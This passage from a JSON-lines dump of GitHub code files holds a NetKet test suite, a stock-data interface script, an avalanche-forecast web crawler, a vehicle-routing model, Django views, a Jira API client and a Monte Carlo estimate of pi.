print(\"0x%02X, \" % (DRAM_V_FB[x] & 0xFF) , end='' )\n print(\"\")\n print(\"};\")\n\n\nif __name__==\"__main__\":\n f = \"logo.png\"\n if len(sys.argv) > 1 :\n f = sys.argv[1]\n Image2FrameBuf(f)\n\n","repo_name":"lvhwa0716/minipanel","sub_path":"bitmapdump/Image2FrameBuf.py","file_name":"Image2FrameBuf.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39473079650","text":"import itertools\nimport netket as nk\nimport networkx as nx\nimport numpy as np\nimport pytest\nfrom netket.hilbert import *\n\nhilberts = {}\n\n# Spin 1/2\nhilberts[\"Spin 1/2\"] = Spin(s=0.5, N=20)\n\n# Spin 1/2 with total Sz\nhilberts[\"Spin 1/2 with total Sz\"] = Spin(s=0.5, total_sz=1.0, N=20)\n\n# Spin 3\nhilberts[\"Spin 3\"] = Spin(s=3, N=25)\n\n# Boson\nhilberts[\"Boson\"] = Boson(n_max=5, N=41)\n\n# Boson with total number\nhilberts[\"Bosons with total number\"] = Boson(n_max=3, n_bosons=110, N=120)\n\n# Qubit\nhilberts[\"Qubit\"] = nk.hilbert.Qubit(100)\n\n# Custom Hilbert\nhilberts[\"Custom Hilbert\"] = CustomHilbert(local_states=[-1232, 132, 0], N=70)\n\n# Heisenberg 1d\nhilberts[\"Heisenberg 1d\"] = Spin(s=0.5, total_sz=0.0, N=20)\n\n# Bose Hubbard\nhilberts[\"Bose Hubbard\"] = Boson(n_max=4, n_bosons=20, N=20)\n\n#\n# Small hilbert space tests\n#\n\n# Spin 1/2\nhilberts[\"Spin 1/2 Small\"] = Spin(s=0.5, N=10)\n\n# Spin 3\nhilberts[\"Spin 1/2 with total Sz Small\"] = Spin(s=3, total_sz=1.0, N=4)\n\n# Boson\nhilberts[\"Boson Small\"] = Boson(n_max=3, N=5)\n\n# Qubit\nhilberts[\"Qubit Small\"] = nk.hilbert.Qubit(N=1)\n\n# Custom Hilbert\nhilberts[\"Custom Hilbert Small\"] = CustomHilbert(local_states=[-1232, 132, 0], N=5)\n\n# Custom Hilbert\nhilberts[\"Doubled Hilbert\"] = nk.hilbert.DoubledHilbert(\n CustomHilbert(local_states=[-1232, 132, 0], N=5)\n)\n\n\n#\n# Tests\n#\n\n\ndef test_consistent_size():\n \"\"\"\"\"\"\n\n for name, hi in hilberts.items():\n # print(\"Hilbert test: %s\" % name)\n assert hi.size > 0\n assert hi.local_size > 0\n if hi.is_discrete:\n assert len(hi.local_states) == hi.local_size\n for state in hi.local_states:\n assert np.isfinite(state).all()\n\n\ndef test_random_states():\n \"\"\"\"\"\"\n nk.random.seed(12345)\n\n for name, hi in hilberts.items():\n assert hi.size > 0\n assert hi.local_size > 0\n assert len(hi.local_states) == hi.local_size\n print(\"name\", name)\n if hi.is_discrete:\n rstate = np.zeros(hi.size)\n local_states = hi.local_states\n for i in range(100):\n hi.random_state(out=rstate)\n for state in rstate:\n assert state in local_states\n\n assert hi.random_state().shape == (hi.size,)\n assert hi.random_state(10).shape == (10, hi.size)\n assert hi.random_state(size=10).shape == (10, hi.size)\n assert hi.random_state(size=(10,)).shape == (10, hi.size)\n assert hi.random_state(size=(10, 2)).shape == (10, 2, hi.size)\n\n\ndef test_hilbert_index():\n \"\"\"\"\"\"\n for name, hi in hilberts.items():\n assert hi.size > 0\n assert hi.local_size > 0\n\n log_max_states = np.log(nk.hilbert.max_states)\n\n if hi.is_indexable:\n assert hi.size * np.log(hi.local_size) < log_max_states\n print(name, hi.n_states)\n assert np.allclose(hi.state_to_number(hi.all_states()), range(hi.n_states))\n\n # batched version of number to state\n n_few = min(hi.n_states, 100)\n few_states = np.zeros(shape=(n_few, hi.size))\n for k in range(n_few):\n few_states[k] = hi.number_to_state(k)\n\n print(name)\n assert np.allclose(\n hi.numbers_to_states(np.asarray(range(n_few))), few_states\n )\n\n else:\n assert not hi.is_indexable\n\n with pytest.raises(RuntimeError):\n hi.n_states\n\n # Check that a large hilbert space raises error when constructing matrices\n g = nk.graph.Hypercube(length=100, n_dim=1)\n op = nk.operator.Heisenberg(hilbert=Spin(s=0.5, N=g.n_nodes), graph=g)\n\n with pytest.raises(RuntimeError):\n m1 = op.to_dense()\n with pytest.raises(RuntimeError):\n m2 = op.to_sparse()\n\n\ndef test_state_iteration():\n hilbert = Spin(s=0.5, N=10)\n\n reference = [np.array(el) for el in itertools.product([-1.0, 1.0], repeat=10)]\n\n for state, ref in zip(hilbert.states(), reference):\n assert np.allclose(state, ref)\n\n\ndef test_deprecations():\n g = nk.graph.Edgeless(3)\n\n with pytest.warns(FutureWarning):\n hilbert = Spin(s=0.5, graph=g)\n\n with pytest.warns(FutureWarning):\n with pytest.raises(ValueError):\n hilbert = Spin(s=0.5, graph=g, N=3)\n\n hi = Spin(0.5, N=2)\n with pytest.warns(FutureWarning):\n hi.random_vals()\n","repo_name":"jrm874/1st_quantized_fermions","sub_path":"netket-master/Test/Hilbert/test_hilbert.py","file_name":"test_hilbert.py","file_ext":"py","file_size_in_byte":4406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7175263848","text":"class Album:\n \"\"\"Класс альбомов\"\"\"\n lst_albums = []\n name = property()\n album = property()\n count_unknown = 0\n\n def __init__(self, name):\n \"\"\"Инициализация\"\"\"\n self.__album = []\n if name:\n self.__name = name\n else:\n Album.count_unknown += 1\n self.__name = 'Unknown({})'.format(Album.count_unknown)\n Album.lst_albums.append(self)\n\n def __str__(self):\n \"\"\"Строковое представление\"\"\"\n s = self.__name + '\\n'\n for song in self.__album:\n s += '{}\\n'.format(song)\n return s\n\n def __repr__(self):\n \"\"\"Представление\"\"\"\n return self.name\n\n @album.getter\n def album(self):\n \"\"\"Получение списка песен аольбома\"\"\"\n return self.__album\n\n @name.setter\n def name(self, new_name):\n \"\"\"Изменение названия аольбома\"\"\"\n self.__name = new_name\n\n @name.getter\n def name(self):\n \"\"\"Получение названия аольбома\"\"\"\n return self.__name\n\n def add_song(self, song):\n \"\"\"Добавление песен в альбом\"\"\"\n self.__album.append(song)\n\n def del_song(self, song_name):\n \"\"\"Удаление песни из альбома\"\"\"\n for song in self.__album:\n if song.name == song_name:\n self.__album.remove(song)\n print('Песня удалена.')\n return\n print('Песня не найдена.')\n return\n\n @classmethod\n def find_album(cls, name):\n \"\"\"Нахождение альбома\"\"\"\n for alb in cls.lst_albums:\n if alb.name.lower() == name.lower():\n return alb\n return None\n","repo_name":"alenatorgasheva/music","sub_path":"album.py","file_name":"album.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33971115205","text":"\"\"\" Script to test how to interface data between Node and Python\nscript based on https://www.sohamkamani.com/blog/2015/08/21/python-nodejs-comm/\n\nScript expects to recieve a json through stdin to determine which actions to take\nand communicates back on stdout\"\"\"\n\n# Imports\nimport json\nimport sys\n\nimport frame_reader\nimport update_data\nimport sector_helper\nimport ai\n\nDISTRIBUTION_TYPES = {\n \"price\" : \"lognorm\",\n \"high\" : \"lognorm\",\n \"low\" : \"lognorm\",\n \"volume\" : \"norm\",\n \"market_cap\" : \"lognorm\",\n \"last_close\" : \"lognorm\",\n \"abs_change\" : \"norm\",\n \"per_change\" : \"norm\"\n }\n\nif __name__ == \"__main__\":\n # Load json arguments passed in from node\n input_args = json.loads(sys.stdin.readline())\n\n predictor = ai.Intent_Predictor()\n log_writer = ai.User_Log_Writer(hooks=[predictor.update_graph])\n\n response = {}\n response[\"result\"] = {}\n response[\"request\"] = input_args\n response[\"error\"] = {}\n\n # Init the data frame reader for easy data access\n try:\n use_test_data = input_args[\"use_test_data\"].lower() == \"true\"\n except (KeyError):\n use_test_data = False\n\n if use_test_data:\n reader = frame_reader.Stock_Reader(data_path=\"./data/test_frames\")\n else:\n reader = frame_reader.Stock_Reader()\n\n request_type_understood = False\n result = -1\n\n # ------------- Handle each type of request specified in the json ------------------#\n\n # get current attribute\n if input_args[\"request_type\"] == \"get_current_attribute\":\n request_type_understood = True\n\n if \"ticker\" in input_args:\n result = reader.get_current_attribute(\n input_args[\"ticker\"],\n input_args[\"attribute\"])\n\n prob = ai.get_likelihood(input_args[\"attribute\"], input_args[\"ticker\"], result,\n distribution=DISTRIBUTION_TYPES[input_args[\"attribute\"]], test=use_test_data)\n elif \"group\" in input_args:\n if input_args[\"group\"][\"type\"] == \"sector\":\n result = reader.get_current_sector_attribute(\n input_args[\"group\"][\"sector_name\"],\n input_args[\"attribute\"])\n\n if result != -1:\n response[\"result\"][\"value\"] = result\n try:\n response[\"result\"][\"likelihood\"] = prob\n except NameError:\n pass\n elif \"ticker\" in input_args:\n response[\"error\"][\"message\"] = \"Stock with ticker '\" + \\\n input_args[\"ticker\"] + \"' was not found\"\n response[\"error\"][\"type\"] = \"ValueError\"\n elif \"group\" in input_args:\n response[\"error\"][\"message\"] = \"Sector with name '\" + \\\n input_args[\"group\"][\"sector_name\"] + \"' was not found\"\n response[\"error\"][\"type\"] = \"ValueError\"\n\n # get attribute from specified time\n if input_args[\"request_type\"] == \"get_attribute\":\n request_type_understood = True\n frame_name = reader.get_closest_frame(input_args[\"start_time\"])\n\n if \"ticker\" in input_args:\n result = reader.get_attribute(\n input_args[\"ticker\"],\n input_args[\"attribute\"],\n frame_name)\n elif \"group\" in input_args:\n if input_args[\"group\"][\"type\"] == \"sector\":\n result = reader.get_sector_attribute(\n input_args[\"group\"][\"sector_name\"],\n input_args[\"attribute\"],\n frame_name)\n \n if result != -1:\n response[\"result\"][\"value\"] = result\n result = -1 # TODO have logging param\n elif \"ticker\" in input_args:\n response[\"error\"][\"message\"] = \"Stock with ticker '\" + \\\n input_args[\"ticker\"] + \"' was not found\"\n response[\"error\"][\"type\"] = \"ValueError\"\n elif \"group\" in input_args:\n response[\"error\"][\"message\"] = \"Sector with name '\" + \\\n input_args[\"group\"][\"sector_name\"] + \"' was not found\"\n response[\"error\"][\"type\"] = \"ValueError\"\n\n # Get attributes of the risers or fallers\n if input_args[\"request_type\"] == \"get_risers_attribute\":\n request_type_understood = True\n\n rising = input_args[\"group\"][\"type\"] == \"risers\"\n result = reader.get_risers_attribute(\n input_args[\"attribute\"],\n input_args[\"group\"][\"quantity\"],\n rising=rising\n )\n\n if result != -1:\n response[\"result\"] = result\n elif \"group\" in input_args:\n response[\"error\"][\"message\"] = \"Sector with name '\" + \\\n input_args[\"group\"][\"sector_name\"] + \"' was not found\"\n response[\"error\"][\"type\"] = \"ValueError\"\n \n # get news on a certain company\n if input_args[\"request_type\"] == \"get_news\":\n request_type_understood = True\n try:\n limit_per_source = int(input_args[\"limit_per_source\"])\n except (KeyError):\n limit_per_source = 10\n\n scraper = update_data.LSE_Reader()\n result = scraper.read_news(input_args[\"ticker\"], limit_per_source)\n \n if result != -1:\n response[\"result\"][\"value\"] = result\n else:\n response[\"error\"][\"message\"] = \"Stock with ticker '\" + \\\n input_args[\"ticker\"] + \"' was not found\"\n response[\"error\"][\"type\"] = \"ValueError\"\n \n \n # Predict the users next request\n if input_args[\"request_type\"] == \"predict_intent\":\n request_type_understood = True\n intent = predictor.predict_intent()\n predicted_request = predictor.intent_to_request(intent)\n response[\"result\"][\"value\"] = predicted_request\n\n # Fit a straight line trend to the specified attribute defaults to week backwards\n if input_args[\"request_type\"] == \"get_trend_attribute\":\n request_type_understood = True\n\n look_back = 604800 # One week in seconds\n try:\n start_time = input_args[\"start_time\"]\n look_back = time.time() - start_time\n except (KeyError):\n pass\n\n result = 1\n grad, y_intercept = ai.fit_trend(input_args[\"attribute\"],\n input_args[\"ticker\"],\n look_back=look_back,\n test=use_test_data)\n\n response[\"result\"][\"gradient\"] = grad\n response[\"result\"][\"y_intercept\"] = y_intercept\n\n\n if not request_type_understood:\n response[\"error\"][\"message\"] = \"Request type '\" + \\\n input_args[\"request_type\"] + \"' was not recognised\"\n response[\"error\"][\"type\"] = \"ValueError\"\n\n\n # If there was no error\n # Log the user request\n if result != -1:\n log_writer.append_request(input_args)\n\n # Send response out on stdout\n print(json.dumps(response))\n","repo_name":"IEavan/SEARLE","sub_path":"modules/analysis/node_interface.py","file_name":"node_interface.py","file_ext":"py","file_size_in_byte":7013,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"70337731946","text":"###############################################################\n# The crawler that loads avalanche forecast data from SAIS website\n# and update them into the database.\n###############################################################\n\nimport sys\nimport os\nimport re\nimport urlparse\nimport json\nfrom selenium import webdriver, common\nfrom time import sleep\n\nimport db_manager\nimport utils\n\n\nclass Crawler:\n \"\"\" The main class generating crawler instances to crawl the SAIS website. \"\"\"\n\n def __init__(self):\n\n #Configure the source API.\n self.__crawlerReportURL = utils.read_config('reportAPI')\n self.__crawlerMapURL = utils.read_config('mapURL')\n self.__crawlerAvalancheURL = utils.read_config('avalancheURL')\n\n if len(self.__crawlerReportURL) == 0:\n raise ValueError(\"Empty report API URL in the configuration file!\")\n\n #Configure the crawler.\n if sys.platform == \"linux2\":\n chromedriver = utils.get_project_full_path() + \"/bin/chromedriver_linux\" #This is the Linux driver.\n else:\n chromedriver = utils.get_project_full_path() + \"/bin/chromedriver_osx\" #Assume it's on OS X otherwise, not using Win.\n os.environ[\"webdriver.chrome.driver\"] = chromedriver\n\n self._crawlerViewDriver = webdriver.Chrome(chromedriver)\n self._crawlerViewDriver.implicitly_wait(4)\n self._crawlerViewDriver.set_page_load_timeout(8)\n\n #Configure the DB interface.\n dbFile = utils.get_project_full_path() + utils.read_config('dbFile')\n self._DBManager = db_manager.CrawlerDB(dbFile)\n\n\n def quit(self):\n \"\"\" Exit the crawler webview driver. \"\"\"\n self._crawlerViewDriver.quit()\n\n\n def crawl_forecasts(self, locations):\n \"\"\" Crawl data of locations in the list. \"\"\"\n\n if len(locations) <= 0:\n return False\n\n #Fetch the report ID source for each location.\n crawlerLocations = []\n for item in locations:\n\n item = str(item)\n if not item.isdigit():\n return False\n\n locationInfo = self._DBManager.select_location_by_id(item)\n crawlerLocations.append([locationInfo[0], locationInfo[2]])\n\n for location in crawlerLocations:\n\n retry_count = 0\n load_success = False\n\n # Attempt to load the page three times, if not working then give up and throw exception.\n while not load_success:\n try:\n self._crawlerViewDriver.get(location[1])\n load_success = True\n except common.exceptions.TimeoutException:\n retry_count += 1\n if retry_count >= 3:\n raise\n\n i = 1\n crawlerReports = []\n\n #Lookup all report IDs until exhaustion.\n while True:\n try:\n crawlerReports.append(int(self._crawlerViewDriver.find_element_by_xpath(\"//ul[@id='report-dates']/li[\" + str(i) + \"]\").get_attribute(\"data-report-id\")))\n i += 1\n except common.exceptions.NoSuchElementException:\n break\n\n #List of lists.\n crawlerData = []\n\n if len(crawlerReports) == 0:\n raise Exception(\"SAISCrawler has failed to obtain any data for this location, likely a network error.\")\n\n for report_id in crawlerReports:\n\n try:\n #Fetch encoded data and its date.\n self._crawlerViewDriver.get(self.__crawlerReportURL + str(report_id))\n crawlerCrURL = self._crawlerViewDriver.find_element_by_xpath(\"//img[@id='cr-img']\").get_attribute(\"src\")\n crawlerCrDate = str(self._crawlerViewDriver.find_element_by_xpath(\"//time[1]\").get_attribute(\"datetime\"))\n except:\n #If the CR URL for that report cannot be loaded.\n crawlerCrURL = None\n\n if crawlerCrURL != None:\n #Wait a little while for throttling.\n sleep(1)\n\n #Parse a compassrose URL, with a integer string on length 32 as forecast data, and three altitude boundaries.\n crawlerParsedURL = urlparse.urlparse(crawlerCrURL)\n crawlerParsedQuery = urlparse.parse_qs(crawlerParsedURL.query)\n\n #Decode the integer string data.\n crawlerParsedForecastData = str(crawlerParsedQuery['val'][0])\n\n #Decode the altitude parameters. They may not always be integers (e.g. \"1055m\"), so match first int found.\n crawlerParsedForecastLowerBoundary = re.findall(r'\\d+', str(crawlerParsedQuery['txts'][0]))[0]\n crawlerParsedForecastUpperBoundary = re.findall(r'\\d+', str(crawlerParsedQuery['txte'][0]))[0]\n #In case some reports not setting the middle boundary (found on Report #6095, #6632):\n try:\n crawlerParsedForecastMiddleBoundary = re.findall(r'\\d+', str(crawlerParsedQuery['txtm'][0]))[0]\n except:\n crawlerParsedForecastMiddleBoundary = str((int(crawlerParsedForecastLowerBoundary) + int(crawlerParsedForecastUpperBoundary)) / 2)\n\n #Check that the data is of correct length.\n if len(crawlerParsedForecastData) != 32:\n raise ValueError(\"Invalid forecast data from webpage.\")\n\n #Slice data, order: N, NE, E, SE, S, SW, W, NW.\n crawlerParsedForecastData = [crawlerParsedForecastData[i:i+4] for i in range(0,len(crawlerParsedForecastData),4)]\n crawlerParsedForecastDataList = []\n for data in crawlerParsedForecastData:\n #Primary, Secondary values for lower, upper sectors.\n crawlerParsedForecastDataList.append(((data[0], data[2]), (data[1], data[3])))\n\n #Add all information to the data set.\n crawlerData.append([crawlerCrDate, (crawlerParsedForecastLowerBoundary, crawlerParsedForecastMiddleBoundary, crawlerParsedForecastUpperBoundary), crawlerParsedForecastDataList])\n\n for data in crawlerData:\n self._DBManager.add_forecast(location[0], data[0], data[1], data[2])\n\n\n def crawl_past_avalanches(self):\n \"\"\" Crawl the Avalanche Map for past avalanches.\"\"\"\n\n retry_count = 0\n load_success = False\n\n # Attempt to load the page three times, if not working then give up\n # and throw exception.\n while not load_success:\n try:\n self._crawlerViewDriver.get(self.__crawlerMapURL)\n load_success = True\n except common.exceptions.TimeoutException:\n retry_count += 1\n if retry_count >= 3:\n raise\n\n # Obtain a list of years of record.\n map_options = self._crawlerViewDriver.find_element_by_xpath('//*[@id=\"mapform\"]/select')\n option_values = [i.get_attribute(\"value\") for i in map_options.find_elements_by_tag_name(\"option\")]\n years = []\n for val in option_values:\n if val.isdigit():\n years.append(int(val))\n\n # Grab avalanche records of each year.\n for year in years:\n year_url = self.__crawlerAvalancheURL + str(year)\n sleep(1)\n self._crawlerViewDriver.get(year_url)\n page_scripts = self._crawlerViewDriver.find_elements_by_tag_name('script')\n\n # Locate the correct script containing the markers.\n correct_script = None\n for script in page_scripts:\n script_inner = script.get_attribute(\"innerHTML\")\n if \"var markers = \" in script_inner:\n correct_script = script_inner\n break\n\n if correct_script is None:\n raise Exception(\"SAISCrawler has failed to find markers in \" + str(year) + \", exiting.\")\n\n # Locate the line with the markers.\n marker_line = None\n script_lines = correct_script.split('\\n')\n for line in script_lines:\n line_str = str(line).strip()\n if line_str.startswith('var markers = '):\n marker_line = line_str\n break\n\n if marker_line is None:\n raise Exception(\"SAISCrawler has failed to find the marker line in \" + str(year) + \", exiting.\")\n\n line_start = marker_line.find('[')\n line_end = marker_line.rfind(']')\n marker_line = marker_line[line_start:line_end+1]\n\n try:\n marker_json = json.loads(marker_line)\n except ValueError:\n print(marker_line)\n raise Exception(\"SAISCrawler has failed to load the marker JSON in \" + str(year) + \", exiting.\")\n\n avalanche_records = []\n try:\n for avalanche in marker_json:\n avalanche_record = [avalanche['ID'], avalanche['Easting'],\n avalanche['Northing'], avalanche['Date'],\n avalanche['Comments']]\n avalanche_records.append(avalanche_record)\n except KeyError:\n raise Exception(\"SAISCrawler has failed to read the marker JSON in \" + str(year) + \", exiting.\")\n\n new, amended_count = self._DBManager.add_past_avalanches(avalanche_records)\n\n print(\"SAISCrawler: added {} new, amended {} for record year {}.\".format(new, amended_count, year))\n\n return True\n\n\n def crawl_all(self):\n \"\"\" Crawl data for all locations in the database. \"\"\"\n\n self.crawl_forecasts(self._DBManager.select_all_location_id())\n self.crawl_past_avalanches()\n load_success = False\n\n\nif __name__ == \"__main__\":\n forecastCrawler = Crawler()\n forecastCrawler.crawl_all()\n","repo_name":"chongyangshi/AvalancheHazardVisualizer","sub_path":"Backend/SAISCrawler/script/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":10071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"69931527467","text":"from typing import List, Dict\nfrom random import randrange\nfrom random import shuffle\nimport numpy as np\n\n\nclass Node:\n index: int\n demand: int\n x: int\n y: int\n\n def __init__(self, index, demand, x, y):\n self.index = index\n self.demand = demand\n self.x = x\n self.y = y\n\n def distance(self, other):\n self_to_c = abs(self.x - other.x)\n c_to_other = abs(self.y - other.y)\n distance = np.sqrt(self_to_c ** 2 + c_to_other ** 2)\n return distance\n\n\nclass VRProblem:\n number_of_trucks: int\n truck_capacity: int\n number_of_nodes: int\n nodes: List[Node]\n node_by_index: Dict[int, Node]\n\n # cost function parameters:\n alpha: int\n beta: int\n route_capacity_limit: int\n route_length_limit: int\n\n def __init__(self, number_of_trucks, truck_capacity, nodes):\n self.number_of_trucks = number_of_trucks\n self.truck_capacity = truck_capacity\n self.number_of_nodes = len(nodes)\n self.nodes = nodes\n\n self.node_by_index = {}\n for node in nodes:\n self.node_by_index[node.index] = node\n\n def set_cost_function_parameters(self, alpha, beta, route_capacity_limit, route_length_limit):\n self.alpha = alpha\n self.beta = beta\n self.route_capacity_limit = route_capacity_limit\n self.route_length_limit = route_length_limit\n\n\nclass VRSolution:\n routes: List[int]\n problem: VRProblem\n update_attempt_counter: int = 0\n cost: float\n cost_clean: float\n\n is_capacity_violated = False\n is_length_violated = False\n\n def __init__(self, problem, routes):\n self.routes = routes\n self.problem = problem\n\n def cost_function(self):\n # solution form:\n # 1 2 0 3 4 0 5 6\n # 0 - route delimiter\n\n total_cost = 0\n total_length_violation = 0\n total_capacity_violation = 0\n\n route_delimiters = [i for i, x in enumerate(self.routes) if x == 0]\n route_delimiters.append(len(self.routes))\n\n current_position = 0\n # enumerating routes:\n for route in range(0, len(route_delimiters), 1):\n if route_delimiters[route] <= len(self.routes):\n route_cost, \\\n route_length_violation, \\\n route_capacity_violation = \\\n self.route_cost_function(current_position, route_delimiters[route])\n\n total_cost += route_cost\n total_length_violation += route_length_violation\n total_capacity_violation += route_capacity_violation\n\n current_position += abs(current_position - route_delimiters[route]) + 1\n\n result = total_cost\n result += self.problem.alpha * total_capacity_violation\n result += self.problem.beta * total_length_violation\n\n if total_length_violation > 0:\n self.is_length_violated = True\n\n if total_capacity_violation > 0:\n self.is_capacity_violated = True\n\n self.cost_clean = total_cost\n return result\n\n def route_cost_function(self, route_start, route_end):\n # print(route_start, '--', route_end)\n route_cost = 0\n route_length = 0\n route_capacity = 0\n\n if route_start == route_end:\n return 0, 0, 0\n\n # add distance from the warehouse\n warehouse = self.problem.node_by_index[1]\n first_node = self.problem.node_by_index[self.routes[route_start]]\n route_cost += warehouse.distance(first_node)\n\n for j in range(route_start, route_end, 1):\n node_index = self.routes[j]\n node = self.problem.node_by_index[node_index]\n\n # add distance to the next node in the route\n if j != route_end - 1:\n next_node_index = self.routes[j + 1]\n next_node = self.problem.node_by_index[next_node_index]\n route_cost += node.distance(next_node)\n\n route_length += 1\n route_capacity += node.demand\n\n # add distance to the warehouse\n warehouse = self.problem.node_by_index[1]\n last_node = self.problem.node_by_index[self.routes[route_end - 1]]\n route_cost += warehouse.distance(last_node)\n\n length_violation = abs(self.problem.route_length_limit - route_length)\n capacity_violation = abs(self.problem.route_capacity_limit - route_capacity)\n\n return route_cost, length_violation, capacity_violation\n","repo_name":"pazamelin/ORA_labs","sub_path":"lab5/bees/problem.py","file_name":"problem.py","file_ext":"py","file_size_in_byte":4472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17769484458","text":"from django.shortcuts import render\nfrom .models import Home\n\ndef home(request):\n home = Home.objects.filter(title='Home').first().description\n about = Home.objects.filter(title='About').first().description\n products = Home.objects.filter(title='Products').first().description\n\n tags = {\n '<img ': '<div class=\"products\"><img style=\"width:100px;height:auto;\" src=\"',\n '></img>': '\"></img>',\n '<desc>': '<div class=\"desc\">',\n '</desc>': '</div></div>',\n }\n for tag in tags:\n products = products.replace(tag,tags[tag])\n products = products.split('\\n')\n return render(request, 'business/home.html', {'home':home, 'about':about,'products':products})","repo_name":"PRREMIA/prremia-django","sub_path":"business/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"23052695631","text":"from django.shortcuts import get_object_or_404\nfrom rest_framework import permissions\nfrom rest_framework import filters\nfrom rest_framework.viewsets import ModelViewSet, ReadOnlyModelViewSet\n\nfrom .serializers import (\n GroupSerializer, PostSerializer, CommentSerializer, FollowSerializer\n)\nfrom .permissions import IsAuthorOrReadOnly\nfrom posts.models import Post, Comment, Group\n\n\nclass PostViewSet(ModelViewSet):\n queryset = Post.objects.all()\n serializer_class = PostSerializer\n permission_classes = [IsAuthorOrReadOnly, ]\n\n def perform_create(self, serializer):\n serializer.save(author=self.request.user)\n\n\nclass CommentViewSet(ModelViewSet):\n serializer_class = CommentSerializer\n permission_classes = [IsAuthorOrReadOnly, ]\n\n def get_queryset(self):\n post = get_object_or_404(Post, id=self.kwargs['post_id'])\n comments = Comment.objects.filter(post=post)\n return comments\n\n def perform_create(self, serializer):\n serializer.save(\n author=self.request.user,\n post=get_object_or_404(Post, id=self.kwargs['post_id'])\n )\n\n\nclass FollowViewSet(ModelViewSet):\n serializer_class = FollowSerializer\n permission_classes = [permissions.IsAuthenticated, ]\n filter_backends = (filters.SearchFilter, )\n search_fields = ('user__username', 'following__username')\n\n def get_queryset(self):\n return self.request.user.follower.all()\n\n def perform_create(self, serializer):\n serializer.save(user=self.request.user)\n\n\nclass GroupViewSet(ReadOnlyModelViewSet):\n queryset = Group.objects.all()\n serializer_class = GroupSerializer\n permission_classes = [IsAuthorOrReadOnly, ]\n","repo_name":"AliaksandrMysleika/api_final_yatube","sub_path":"yatube_api/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15270033458","text":"from datetime import datetime\nfrom typing import List, Generator\n\nimport requests\nfrom django.conf import settings\nfrom pydantic import BaseModel, parse_obj_as\nfrom requests.auth import HTTPBasicAuth\n\nfrom jira.models import JiraIssue, JiraMapping\n\n\ndef get_all_jira_issues() -> list:\n start_at = 0\n total = 0\n issues = []\n while total >= start_at:\n response = requests.get(\n f\"https://{settings.JIRA_DOMAIN}/rest/api/latest/search\",\n {\n \"jql\": f\"project = {settings.JIRA_BOARD} ORDER BY created DESC\",\n \"startAt\": start_at,\n }, # type: ignore\n auth=HTTPBasicAuth(settings.JIRA_USERNAME, settings.JIRA_TOKEN),\n )\n assert response.status_code == 200, response.json()\n issues += response.json()[\"issues\"]\n start_at += response.json()[\"maxResults\"]\n total = response.json()[\"total\"]\n assert (\n len(issues) == total\n ), f\"issues={len(issues)}, total={total}, start_at={start_at}\"\n return issues\n\n\nclass CustomField(BaseModel):\n id: str\n name: str\n\n\ndef get_all_jira_custom_fields() -> Generator[CustomField, None, None]:\n response = requests.get(\n f\"https://{settings.JIRA_DOMAIN}/rest/api/2/issue/createmeta?projectKeys={settings.JIRA_BOARD}&expand=projects.issuetypes.fields\",\n auth=HTTPBasicAuth(settings.JIRA_USERNAME, settings.JIRA_TOKEN),\n )\n assert response.status_code == 200, response.json()\n issuetypes = response.json()[\"projects\"][0][\"issuetypes\"]\n\n # Nested loop with if, we could parse it better but let's say it's fine for now\n for issuetype in issuetypes:\n for field_id, field in issuetype[\"fields\"].items():\n if field_id.startswith(\"customfield_\"):\n yield CustomField(id=field_id, name=field[\"name\"])\n\n\nclass Status(BaseModel):\n id: int\n name: str\n\n\ndef get_statuses() -> List[Status]:\n response = requests.get(\n f\"https://{settings.JIRA_DOMAIN}/rest/api/2/project/{settings.JIRA_BOARD}/statuses\",\n auth=HTTPBasicAuth(settings.JIRA_USERNAME, settings.JIRA_TOKEN),\n )\n assert response.status_code == 200, response.json()\n statuses = response.json()[0][\"statuses\"]\n return parse_obj_as(List[Status], statuses)\n\n\ndef update_selected_field(jira_mapping: JiraMapping, issues: List[JiraIssue]) -> None:\n for issue in issues:\n response = requests.put(\n f\"https://{settings.JIRA_DOMAIN}/rest/api/2/issue/{issue.key}/\",\n json={\n \"fields\": {jira_mapping.selected_field_id: datetime.now().isoformat()}\n },\n auth=HTTPBasicAuth(settings.JIRA_USERNAME, settings.JIRA_TOKEN),\n headers={\"Content-Type\": \"application/json\"},\n )\n assert response.status_code == 204\n","repo_name":"BesnardConsultingSAS/jira-automations","sub_path":"backend_automations/jira/jira_client.py","file_name":"jira_client.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29279566911","text":"\"\"\"\nPython program that estimates the value of π\nusing Monte Carlo.\n\nFormula:\nLet p = Area of circle = πr² -> Sum of points in circle\nLet q = Area of square = (2r)² -> Sum of points in square\n\np / q = π / 4 = Sum of points in circle / Sum of points in square\nπ = 4 * (No. of points in circle / No. of points in square)\n\n[https://www.geeksforgeeks.org/estimating-value-pi-using-monte-carlo/]\n\"\"\"\n\nfrom random import uniform\n\n# Estimate the value of π given a sample size n\ndef estimatePi(n: int) -> float:\n numInCircle = 0 # Number of points in the circle\n numTotal = 0 # Number of points total \n\n for i in range(n):\n # Uniformly distributed random (x, y) point in the range [0, 1]\n x, y = uniform(0, 1), uniform(0, 1) \n \n # Distance from origin to the current (x, y) \n dist = (x ** 2) + (y ** 2)\n\n # Increment number of points in the circle\n # if distance <= 1\n if dist <= 1:\n numInCircle += 1\n\n # Increment total points overall\n numTotal += 1\n\n return 4 * (numInCircle / numTotal)\n\nif __name__ == '__main__':\n n = int(input('Enter sample size: '))\n print(f'Estimated value of π: 